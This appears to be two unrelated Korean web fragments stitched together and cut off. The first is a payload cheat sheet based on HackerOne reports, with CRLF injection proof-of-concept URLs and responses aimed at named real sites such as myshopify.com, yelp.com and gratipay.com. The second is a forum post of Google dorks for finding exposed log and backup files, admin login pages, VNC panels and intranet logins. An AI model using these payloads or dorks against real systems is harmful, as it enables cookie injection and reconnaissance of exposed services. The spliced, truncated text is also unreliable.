이 문서는 HackerOne 에서 제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다. Link : https://hackerone.com/ Vulnerabilities list 1. CRLF Injection 2. Open Redirection 3. Cross-Site-Scripting 4. SQL-Injection 5. Path Traversal CRLF Injection PoC http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; PoC: https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com PoC (Chrome, Internet Explorer) http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; HTTP Resp...
* 39.117.243.43 * | Home | Profile | Linux | 자료실 | zabbix | Mysql 5.6 | 갤러리 | 성경검색 | 해피니스 | 자유게시판 | 게시물검색 | L | O | R | [기초강좌] 구글 검색 옵션 작성자 : rootmanDate : 2007-02-07 09:39 | Hit : 729,786 --------------------------------------------- facebook 관련글 검색 --------------------------------------------- 키워드 + space + site:facebook.com 키워드 + spcae + site:facebook.com/pages 키워드 + spcae + site:facebook.com/group 키워드 + spcae + site:facebook.com/profile --------------------------------------------- 로그 파일 --------------------------------------------- db filetype:log intitle:"index of" intext:(backup|백업|bak|dump) --------------------------------------------- 로그인 --------------------------------------------- 로그인 inurl:/admin filetype:php inurl:/admin filetype:asp "VNC Desktop" inurl:5800 intitle:"원격 데스크톱 웹 연결" inurl:tsweb intitle:관리자 로그인 intitle:"인트라넷" intitle:"intranet" intitle:"직원용 intitle:"사내" intext:로그인" ---...